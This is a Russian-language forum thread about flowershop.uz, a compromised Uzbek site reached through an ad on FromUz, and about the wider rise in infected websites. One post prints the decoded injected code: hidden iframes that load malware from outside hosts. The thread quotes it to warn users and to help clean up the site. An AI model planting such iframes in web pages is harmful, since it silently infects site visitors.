FromUz - атака на эмигрантов!

[Ilya V. Dolgushin]

Сам я не решился пройти по ссылке на FromUz`е, но вот что пишут пользователи этого форума:

Цитата:

Всем приветик!
Видели наверху призыв "найдем и поздравим наших учителей"? Что-то идея мне понравилась, хотела залезть по ссылке, узнать больше, а там как поперли вирусыыыы! Еле убежала................

http://www.fromuz.com/forum/index.ph...post&p=1565616

Так что будьте осторожны...

[Dmitry Paleev]

Спасибо за информацию. На самом деле с FromUz ничего не произошло. Угрозу представляет веб-сайт hттp://www.FlowerShop.uz, на который ссылается рекламная ссылка "найдем и поздравим наших учителей" размещенная на FromUz.

При открытии веб-сайта hттp://www.FlowerShop.uz срабатывает вредоносная ссылка размещенная в index файле между тегами
<!-- start get_javascript вредоносная ссылка <!-- end get_javascript(applicationtop2header) //-->

После раскодирования зашифрованного текста, получаем следующую ссылку - hттp://977398530/?2954196ea44dc2a0

Веб-сайт, расположенный по данной ссылке содержит следующий вредоносный код:

Код:

<iframe src='http://malasha.com' width='6' height='6' style='visibility: hidden;'></iframe>
<iframe src='http://977398531/s' width='6' height='6' style='visibility: hidden;'></iframe>

После чего, на компьютер пользователя пытается установиться вредоносное ПО. Будьте бдительны. Администрации веб-сайта hттp://www.FlowerShop.uz будет сообщено об инциденте.

[netklon]

Спасибо за информацию.

Наша компания (eSector Solutions) занимается поддержкой сайта flowershop.uz. Внедренный javascript-код был нами удален.

[Eldar Ishimbaev]

Цитата:

Сообщение от netklon

Наша компания (eSector Solutions) занимается поддержкой сайта flowershop.uz. Внедренный javascript-код был нами удален.

К сожалению простое удаление может оказаться неэффективным. Сканирование рабочих станций на вредоносное ПО, смена паролей и пр. Бот, записывающий код в исходники может работать циклично. Наверное, подробно Вам описывать не нужно.

[Evgeniy Sklyarevskiy]

Хотелось бы узнать - это массовая атака на Узнет или просто раньше не обращали внимания на это?
И что делает вирус на зараженном компьютере?

[Dmitry Paleev]

Цитата:

Сообщение от Evgeniy Sklyarevskiy

Хотелось бы узнать - это массовая атака на Узнет или просто раньше не обращали внимания на это?
И что делает вирус на зараженном компьютере?

Массовой атаки на узнет замечено не было. На сегодняшний день по статистике различных экспертов по информационной безопасности во всем мире на первых местах стоит как раз угроза внедрения вредоносного кода на веб-сайты. В основном это делается для того, чтобы воровать идентификационные данные пользователей и вовлекать их компьютеры в различные бот-сети. Данный вид угрозы широко распространен практически во всех странах. Узбекистан не исключение. Если в прошлом году мы могли наблюдать единичные случаи внедрения вредоносного кода на сайты, то в этом году это уже становится действительно серьезной проблемой.

[Eldar Ishimbaev]

Цитата:

Сообщение от Dmitry Paleev

Массовой атаки на узнет замечено не было.

Дима, я думаю можно опубликовать в цифрах сколько всего найдено инфицированных сайтов в сети Интернет.

[Dmitry Paleev]

Примерно один из десяти веб-сайтов, проиндексированных крупнейшей поисковой системой Google, содержит троянский код, способный заразить компьютер посетителя. К такому выводу пришел исследователь Google Нильс Провос, проведший с коллегами анализ 4,5 миллиона веб-страниц.

На 450 тысячах сайтах был обнаружен код, загружающий различные вредоносные или шпионские программы. Еще на 700 тысячах исследователи обнаружили код, который потенциально может нарушить безопасность системы. "Для того чтобы заставить пользователя установить вредоносный код, используется социальная инженерия, - пишет Нильс Провос в докладе "Призрак в браузере". - Пользователю предоставляются ссылки, на которых обещают "интересные" страницы с откровенным порнографическим контентом, пиратским ПО или музыкой и видео. Типичный пример таких сайтов - галерея уменьшенных изображений со ссылками якобы на взрослые видеоклипы".

Вредоносный код нередко попадает и на легальные веб-страницы. Исследователи обнаружили его в баннерах и виджетах. С развитием Web 2.0 и сайтов с контентом, составленным самими пользователями, проникновение на компьютеры через веб-страницы становится новым привлекательным вектором атаки.

Еще один способ - взлом легальных веб-сайтов и внедрение в страницы вредоносного кода. Посещая доверенный сайт, пользователь может не обращать внимания на предупреждения об опасности или понизить уровень защиты заранее. В ходе исследования авторы доклада заразили свои компьютеры 50 различными видами вредоносного кода, посещая легальные веб-страницы, "угнанные" хакерами.

[Dmitry Paleev]

В отчете компании Sophos говорится, что на сегодняшний день в Сети появляется около 30 тысяч новых вредоносных веб-сайтов, вместо 5000 в день в апреле, т.е. можно сказать, их количество увеличивается в геометрической прогрессии. Столь устрашающую тенденцию Sophos объясняет двумя причинами.

Хакеры все чаще переключаются с e-mail в качестве предпочтительного метода распространения вредоносного ПО на веб-сайты, причем чаще всего взламывают легитимные сайты и помещают на них вредоносное ПО. 80% — это взломанные легитимные сайты. Другая причина столь резкого скачка числа вредоносных сайтов - их просто стали лучше искать...